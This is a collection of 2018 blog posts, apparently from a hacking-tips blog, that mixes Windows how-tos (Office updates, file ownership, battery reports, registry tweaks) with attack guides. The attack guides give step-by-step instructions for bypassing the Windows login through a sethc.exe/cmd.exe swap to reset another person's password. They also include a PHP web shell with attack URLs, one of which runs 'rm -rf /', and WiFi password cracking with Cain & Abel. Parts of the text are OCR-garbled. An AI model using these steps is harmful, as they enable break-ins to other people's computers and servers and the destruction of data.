Sunday, December 16, 2018

How to install updates for Office apps

How to install updates for Office apps manually on Windows 10

Not sure if you're running the latest version of Office? Here's how to check, install, and verify whether you're using the latest version of Office 365 or Office 2019.

Although if you ask around, anyone will say that if you're using the Office 365 apps, then you're running the most up-to-date version of Office that Microsoft has to offer, you may still be missing out on new features and improvements if your device hasn't received the latest update.
Microsoft updates its Office apps on a regular basis, and even though updates should download and install automatically, it doesn't necessarily mean that you'll receive updates as soon as they become available. Also, if it happens that the automatic update service has been disabled, there's no way for your device to grab those new fixes and improvements.

How to update Office apps on Windows 10

To update the suite of Office apps to the latest version, use these steps:
Note: The interface may look a slightly different depending on the version of Office that you're running, but the steps are the same.
  1. Open an Office app. For example, Word.
  2. Create a new blank document.
  3. Click on File.
  4. Click on Account.
  5. On the right side, click the Update Options menu.
  6. Click the Update Now option.



    7- Continue with the on-screen directions to apply new updates (if applicable).
    Once you've completed the steps, Office will download and install any available update for your apps.

    Enabling updates for Office

    If you don't see the option to update Office, use these steps to enable the service:
      1-   Open an Office app. For example, Word.
      2-   Create a new blank document.
     3-  Click on File.
     4-  Click on Account.
     5-  On the right side, click the Update Options menu.
     6-  Click the Enable updates option.



After completing the steps, use the above steps to check, download, and install updates.

Checking the latest version of Office

To make sure that you're running the latest version of Office, use these steps:
  1. Open an Office app, such as Word.
  2. Create a new blank document.
  3. Click on File.
  4. Click on Account.
  5. On the right side, check the version information under About Word.



if you have an Office 365 Personal or Home subscription, the version number of your installation should match the number in this Office support website to confirm that you're using the latest release.



 

You can use these steps to update apps available through Office 365, Office 2019, 2016, and older versions. The only difference is that updating Office 365 apps will sometimes include new features and significant improvements along with security patches, while updates for the standalone version of Office (2019, 2016, 2013) will only include security and maintenance fixes.

How to take ownership

How to take ownership of files and folders on Windows 10

When you need to modify system files or gain full control over another account's files, use this guide to learn the steps to take ownership of files and folders on Windows 10.





 Windows 10's file system can be used to to assign permissions to specific groups and users to access files and folders on a computer.
When you're signed in to your Windows 10 account, you get full control over the files and folders you create, sometimes you may also need access to other files. It could be files from an old account from a user that's no longer around, or maybe some system files you need to tweak edit to customize certain aspects of the operating system.
 If you don't have specific permissions, Windows 10 will deny you access. But if your account has administrative privileges, you can take ownership of certain files and folders on your computer.
In this guide, we'll walk you through the steps to take ownership of files and folders on your Windows 10 PC without the need of a third-party tool

How to take ownership of files and folders

  1. Open File Explorer.
  2. Browse and find the file or folder you want to have full access.
  3. Right-click it, and select Properties.
  4. Click the Security tab to access the NTFS permissions.
  5. Click the Advanced button


6- On the "Advanced Security Settings" page, you need to click the Change link, in the Owner's field.

      7-Click the Advanced button.
      8-On the "Select User or Group" page, click the Find Now button.
      9-From the search result, select your user account, and click OK.

 10-On the "Select User or Group" page, click OK.
 11-Click Apply.
 12-Click OK

 13- Click OK again.
14-Click OK one more time to complete this task.

It's important to note that if you're taking ownership of a folder, you can check the Replace ownership on subcontainers and object option in the Advanced Security Settings page to take control of the subfolders inside of the folder
.
Now you'll need to grant full access control to your account, to do this use the following steps:

  1. Right-click the file or folder and select Properties.
  2. Click the Security tab to access the NTFS permissions.
  3. Click the Advanced button.
  4. Under the Permissions tab, click Add


 5-Click Select a principal to add your user account.
  6-On the "Select User or Group" page, click the Find Now button.
  7-From the search result, select your user account, and click OK.
  8-On the "Select User or Group" page, click OK
      09-On "Permission Entry", check the Full control option.
      10-Click OK.
 
           11-Click OK.
           12-Click Apply.
           13-Click OK.
           14-Click OK to close the file or folder properties to complete the task.

It's important to note that if you're taking ownership of a folder, you can check the Replace all existing inheritable permissions on all descendants with inheritable permissions for this object option in the Advanced Security Settings page to replace the subfolders permissions with the settings from the parent folder.











 

Sunday, December 02, 2018

Privacy Attacks

Here attacker uses various  automated   tools which are freely available  on the internet. Some of them  are as follows:

1) Trojan-:Trojan  is a Remote  Administration  Tool (R.<\T) which enable  attacker  to execute  various  software and hardware instructions on the target  system.

Most  troj ans consist  of two parts  -
  1. a) The Server Part:- It has to be installed  on the the victim's  
  2. b) The Client Part r- It is installed on attacker's sy  This part  gives attacker complete  control  over target  computer.


Netbus,  Girlfriend, subz,  Beast, Back Orifice are some of the popular trojans.

2) Ke.ylogger :- Keyloggers are the tools which enable  attacker  to record  all the keystrokes  made  by victim and send it's logs secretly  to the attacker's e-mail  address which is previously set by him.

Almost  all the Trojans  have keylogging function.

3) Spyware  :- Spyware utilities are the malicious programs that spy on the activities of victim, and covertlypass on the re.corded information to the attacker without the victim's consent. Most spyware utilities monitor and record the victim's interne.t• surfing habits. Typically, a spyware tool is built into a host .exe file or utility. If a victim downloads and executes an infected .exe file, then the spywarebecomes active on the victim's system.
Spyware tools can be hidden both in .exe files an even ordinary cookie files.
Most spyware tools are created and re.leased on the internet with the aim of collecting useful information about a large number of Internet users for marketing and advertising purposes. On many occasions, attacker also usespyware tools for corporate espionage and spying purposes.

4) Sniffer :- Sniffers were originally developed as a tool for debugging/troubleshooting networkproblems.
The Ethernet based sniffer works with network interface card (NIC) to capture
interprete and save the data packets sent across the network.
Sniffer can turn out to be quite dangerous. If an attacker manages to install a sniffer on your system or the router of your network, then all data including passwords, private messages, company secrets, etc. get captured.
All email communications   on the internet are possible  by two protocols:
1) Simple Mail Transfer Protocol  (SMTP port-zg)
2) Post Office Protocol  (POP port-no)

E-Mail hacking  consists  of various  techniques   as discussed  below.

1) EMail Tracing:-  Generally,  the path taken  by an email while travelling from sender  to receiver  can be explained  by following diagram.

The most effective and easiest  way to trace an email is to analyze  it's email headers. This can be done by just  viewing the full header  of received email.  A typical email header  looks something  like this:



Wednesday, November 21, 2018

Hack Windows 10 Login Password In 2 Minutes

Forgot Windows Administrator Password? The first thing a normal user tries to do is take the PC to service center and do a  fresh re-installation of windows. In that case, one may lose all the data, not to mention the service charges.  In another scenario, suppose if you want to hack into someone's PC there are a few methods to follow, like using Hiren CD, Trinity Rescue Kit, OphCrack etc. It takes a considerable amount of time and computer skills and also these methods are not always successful. In such cases, the below given method comes in handy.

Method 1

) Any Linux live CD(like Ubuntu CD)/USB. If you don't have one download any Linux distribution ISO file and Make a bootable CD/USB. For simplicity sake, I suggest Puppy Linux (lightest Linux distro, less than 200mb)

2)Basic knowledge in dealing with cmd, boot menu etc.

So let's get started.


1)Insert the live CD/USB and boot from it.

2)Locate the drive where Windows is installed.(C drive) Goto Windows/system32 folder.

3)Find out a file named 'cmd.exe' and rename it to 'cmd0.exe'

4)Next, find another file by the name 'sethc.exe' [It is the program for windows sticky keys] Rename sethc.exe to cmd.exe.

5)Finally, rename cmd0.exe to sethc.exe. [Swapping the sticky keys program with Command Prompt (cmd). So whenever Sticky Keys program is called it runs cmd and vice versa. ]

5)Great! Now Shutdown and boot into Windows.

6)Press shift key five or six times at the login screen.

7)Now the command prompt will open up. Type this without quotes and hit enter.

"net user"

 8) Now you can see the list of active accounts [User Names] in the PC. Make a note of the Account Name you need to hack.

9) type the following command and hit enter.

"net user <space><Account Name><space> *"





Note  <space>: leave space

          <Account Name> Replace it with the account you need to hack. In this example 'Mathews'

8)It will display 'enter new password'. Enter any new password and confirm. To remove password leave it blank.





Done! You can log in with the new password now.






 

Sunday, November 18, 2018

Hacking Linux OS

Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.

Linux Hacking Tools

  • Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at http://www.tenable.com/products/nessus
  • NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at http://nmap.org/
  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at http://www-arc.com/sara/sara.html
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
  • Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  • Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
  • Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack a Ubuntu Linux System using PHP

In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>
 HERE,
The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.
The above code can be exploited using the following URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HERE,
  • “…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.
The command executed against the server will be
 
shell_exec('ls -l') ;
 Executing the above code on a web server gives results similar to the following.

The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command

rm -rf /

HERE,
  • “rm” removes the files
  • “rf” makes the rm command run in a recursive mode. Deleting all the folders and files
  • “/” instructs the command to start deleting files from the root directory
The attack URL would look something like this
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Friday, November 16, 2018

How to Hack WiFi (Wireless) Network


How to Crack Wireless Networks

WEP cracking
Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;

  • Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
  • Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.

WEP Cracking Tools

WPA Cracking

WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.
We will provide you with basic information that can help you get started. Backtrack is a Linux-based security operating system. It is developed on top of Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities and perform exploits among other things.
Some of the popular tools that backtrack has includes;
  • Metasploit
  • Wireshark
  • Aircrack-ng
  • NMap
  • Ophcrack
Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools
wireless network adapter with the capability to inject packets (Hardware)

  • Kali Operating System. You can download it from here https://www.kali.org/downloads/
  • Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
  • Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
  • Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.

Hacking Activity: Crack Wireless Password

In this practical scenario, we are going touse Cain and Abel to decode the stored wireless network passwords in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.

Decoding Wireless network passwords stored in Windows

  • Download Cain & Abel from the link provided above.
  • Open Cain and Abel
 

  • Ensure that the Decoders tab is selected then click on Wireless Passwords from the navigation menu on the left-hand side
  • Click on the button with a plus sign
 
  • Assuming you have connected to a secured wireless network before, you will get results similar to the ones shown below
 
 The decoder will show you the encryption type, SSID and the password that was used.



                       πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€πŸ˜€









                    

Thursday, November 15, 2018

laptop battery health

 How to check your laptop battery health in Windows 7

Windows 7 includes a new command that shows you a lot of details on its power usage & settings and helps you troubleshoot power issues (like Windows 7 waking up unexpectedly when you've put it in Sleep mode).
This command also shows you some detailed information about your laptop's battery, including its design capacity and the last full charge. With this data you can calculate how much (percentage-wise) your battery has deteriorated over time. Let's have a look:
  1. Click Start button and type cmd in Search programs and files box
  2. Right click on cmd.exe listed at the top of the Start menu and click Run as administrator
  3. In the command prompt type cd %userprofile%/Desktop and press Enter
  4. Next type powercfg -energy in the command prompt and press Enter

    powercfg will enable a trace for 60 seconds. If you want to use it for more information than just the battery details, make sure no other processes are running during that time

When finished, powercfg will generate a report (in html format) which shows errors, warnings etc. Since we directed the command prompt to your desktop, the report will be placed on your desktop as energy-report.html. Just open the report in your web browser & scroll down to the Battery Information section.


Above are two samples. On the left is a relatively new battery (a few months old). As you can see, the last full charge is only some 5.5% below the design capacity.
On the right is an old battery (around 4 years old) which shows that the last full charge was nearly 40% below the design capacity. From experience I know that this battery will only last a few months more. I've had a battery fail a few months after it tested 45% below its design capacity. I recently did a 'stress test' on this battery (which will show you the minimum time you can expect while running the laptop at 'full power'), and it only managed 36 minutes. Compare that with 125 minutes for the new battery.

Wednesday, November 14, 2018

Windows 7 Registry Hacks

Change Taskbar Button Stacked Window Behavior

By default, the Taskbar groups together multiple windows of a single app, then displays all of them as thumbnails when you click on the program’s Taskbar icon. If you think it would be more handy to have Windows automatically open the last window when you click the icon, you can make that happen.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced.
2. Right-click in the right pane, and select “New” then “DWORD (32-bit) Value.”
3. Rename the new DWORD value “LastActiveClick.”
4. Double-click on LastActiveClick to open it.
5. Change the value in the “Value data” field to 1.
6. Click OK.

Change the Width of Taskbar Buttons
 

Windows 7 is set up to always combine Taskbar buttons from the same program and never display their labels. If, however, you’ve changed the setting to either not combine the windows at all or to only combine them when the Taskbar is full, you can change the icons’ width to hide the labels there, too. Here’s how.
1. Navigate to HKEY_CURRENT_USERControl PanelDesktopWindowMetrics
2. Scroll to find the “MinWidth” entry. If it’s not there, you’ll have to create it yourself. Right-click in the right pane, select New, then Select “String Value,” and name the object MinWidth.
3. Double-click MinWidth to open it.
4. Change the number in the “Value Data” field the width you want to allot to the icons. With the default small buttons, 38 is sufficient; with the larger icons, you’ll want about 52.
5. Click OK.

Change the Delay Time of Taskbar Previews
 
Among the cooler features in Windows 7 are Taskbar previews, which appear when you hover the mouse cursor over the Taskbar icon of a currently running program. But when you do this, the preview doesn’t appear immediately. Luckily, it’s easy to speed it up (r, for whatever reason, slow it down.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced
2. Right-click in the right pane, click “New,” and click “DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD “ExtendedUIHoverTime.”
4. Double click on ExtendedUIHoverTime to open it.
5. Click the “Decimal” radio button in the “Base” section. In the “Value data” field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 400ms.)
6. Click “OK” to commit the change.


 Change the Delay Time of Aero Peek
 
Aero Peek is Windows 7’s sleeker replacement for the old Show Desktop button. Just move your mouse cursor over the icon at the right end of the Taskbar to turn all your Windows invisible. But this, too, has a delay time associated with it, so if you find yourself accidentally activating it too often, you may want to increase the delay time. Here’s how.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced
2. Right-click in the right pane, click “New,” and click “DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD “DesktopLivePreviewHoverTime.”
4. Double click on DesktopLivePreviewHoverTime to open it.
5. Click the “Decimal” radio button in the “Base” section. In the “Value data” field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 1,000ms.)
6. Click “OK” to commit the change

                                                          SHACKINGTRICKS